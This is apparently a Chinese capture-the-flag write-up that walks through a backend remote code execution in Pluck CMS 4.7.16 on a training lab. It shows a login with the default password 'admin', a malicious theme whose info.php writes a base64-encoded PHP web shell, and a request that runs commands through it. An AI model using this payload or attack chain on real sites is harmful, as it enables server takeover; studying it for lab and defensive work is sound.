简介

是一个CMS系统----Pluck-CMS-Pluck-4.7.16 的后台RCE漏洞。

本人使用春秋云境免费靶场在线搭建。

详解

  1. 打开首页,发现下面有两个按钮可以点,其中一个应该是后台登录按钮

16835331151424.png

  1. 点击admin,果然跳转到了登录页面,只有密码框,输入admin,登录成功,惊呆了老铁!!!

16835372512666.png

  1. 上图是管理界面,随便点点,发现一个上传图片和上传文件的入口,尝试了一下,无法获得shell

16835375289346.png

  1. 又发现一个可以上传主题入口,需要上传zip压缩文件。

16835378326454.png
16835379981698.png

  1. github找了个开源主题,阅读源码,发现安装主题会读取并执行主题中info.php。修改info.php代码。
<?php
file_put_contents('shell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8+'));
?>

file_put_contents() 是 PHP 中的一个函数,用于将一个字符串写入文件中。

  1. 上传成功后,切换主题并保存。

168353927167.png

  1. 首页访问shell.php文件,cmd参数传入cat /falg获取falg。
http://eci-2ze55xp3m6rd9j75pecz.cloudeci1.ichunqiu.com/shell.php?cmd=cat%20/flag

结语

我加入了腾讯云自媒体分享计划,可以获取到腾讯云周边、技术书籍、线下沙龙、云服务器优惠等等。
我的博客即将同步至腾讯云开发者社区,邀请大家一同入驻:https://cloud.tencent.com/developer/support-plan?invite_code=1f93zvim5fqci